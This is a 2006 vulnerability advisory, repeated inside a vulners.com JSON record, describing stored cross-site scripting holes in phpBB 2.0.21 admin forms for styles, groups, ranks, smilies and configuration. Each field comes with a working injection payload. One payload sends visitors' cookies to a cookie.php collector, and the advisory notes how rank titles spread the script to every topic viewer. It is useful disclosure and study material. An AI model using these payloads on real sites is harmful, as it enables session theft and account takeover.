phpBB 2.0.21 XSS in administration
**********************************
//-- By Blwood [renatrix@gmail.com]
//-- [ http://www.blwood.net ]
//--
Style Admin
-----------
Management & Create a theme
Lots of input are not properly "filtrate" like style_name, head_stylesheet, body_background, tr_color1_name (all the input in simple name)...
We cand ofcourse inject html in this way : "><h1>Owned by Blwood :P</h1>
but it's more interresting to inject javascript :) :
"><body onload="alert('Owned by Blwood')"> => style_name
"><script>alert('Owned by Blwood')</script> => head_stylesheet, body_background, ...
When an admin will go in Style Administration he will be Owned. (inject in style_name)
When an admin will edit a them he will be Owned.
Group Administration
--------------------
Management
Input group_description is not correctly "filtrated" we can inject js like this : "><script>alert('Owned by Blwood')</script> or </textare>"><script>alert('Owned by Blwood')</script>
When an admin will go in Group administration he'll be owned. But what's more, the groups can be seen in groupcp.php
by every visitors.
An exploit could be :
</textarea>"><script>document.location='http://127.0.0.1/cookie.php?'+document.cookie</script>
or
</textarea>"><script>document.location='http://site.com/ownedpage.html'</script>
Ranks
-----
Rank Administration
Rank Title (input title) is not correctly filtrated, we can inject js like : "><script>alert('xss')</script>
But what's interresting, if you give this rank to an user, the rank will appear in user's topics and the code will be executed when someone sees a topic :)
Now you can inject what you want but maximum 40 caracters...
Smilies
-------
Smiles Editing Utility
Smiley Code : "><body onload="alert('Owned by Blwood')">
Configuration
-------------
General Configuartion
Inputs are not correctyle filtrated : Ex : allow_html_tags => "><script>alert('Owned by Blwood')</script>
[ Video ]
http://www.blwood.net/advisory/phpbb2021xssadmin.rar
{"id": "SECURITYVULNS:DOC:13542", "bulletinFamily": "software", "title": "XSS phpBB 2.0.21 in administration", "description": "phpBB 2.0.21 XSS in administration\r\n**********************************\r\n\r\n//-- By Blwood [renatrix@gmail.com]\r\n//-- [ http://www.blwood.net ]\r\n//-- \r\n\r\nStyle Admin\r\n-----------\r\n\r\nManagement & Create a theme\r\n\r\nLots of input are not properly "filtrate" like style_name, head_stylesheet, body_background, tr_color1_name (all the input in simple name)...\r\n\r\nWe cand ofcourse inject html in this way : "><h1>Owned by Blwood :P</h1> \r\nbut it's more interresting to inject javascript :) : \r\n"><body onload="alert('Owned by Blwood')"> => style_name\r\n"><script>alert('Owned by Blwood')</script> => head_stylesheet, body_background, ...\r\nWhen an admin will go in Style Administration he will be Owned. (inject in style_name)\r\nWhen an admin will edit a them he will be Owned.\r\n\r\n\r\nGroup Administration\r\n--------------------\r\n\r\nManagement\r\n\r\nInput group_description is not correctly "filtrated" we can inject js like this : "><script>alert('Owned by Blwood')</script> or </textare>"><script>alert('Owned by Blwood')</script>\r\nWhen an admin will go in Group administration he'll be owned. But what's more, the groups can be seen in groupcp.php \r\nby every visitors.\r\nAn exploit could be : \r\n</textarea>"><script>document.location='http://127.0.0.1/cookie.php?'+document.cookie</script>\r\nor\r\n</textarea>"><script>document.location='http://site.com/ownedpage.html'</script>\r\n\r\nRanks\r\n-----\r\n\r\nRank Administration\r\n\r\nRank Title (input title) is not correctly filtrated, we can inject js like : "><script>alert('xss')</script>\r\nBut what's interresting, if you give this rank to an user, the rank will appear in user's topics and the code will be executed when someone sees a topic :)\r\nNow you can inject what you want but maximum 40 caracters...\r\n\r\n\r\n\r\nSmilies\r\n-------\r\n\r\nSmiles Editing Utility\r\n\r\nSmiley Code : "><body onload="alert('Owned by Blwood')">\r\n\r\nConfiguration\r\n-------------\r\n\r\nGeneral Configuartion\r\n\r\nInputs are not correctyle filtrated : Ex : allow_html_tags => "><script>alert('Owned by Blwood')</script>\r\n\r\n\r\n\r\n[ Video ]\r\n\r\nhttp://www.blwood.net/advisory/phpbb2021xssadmin.rar\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "published": "2006-07-24T00:00:00", "modified": "2006-07-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13542", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 148, "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6389"]}]}, "exploitation": null, "vulnersScore": 0.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659916711, "score": 1659917426}, "_internal": {"score_hash": "f643c75ffe8b5f9f7aa8e70d60d965d2"}}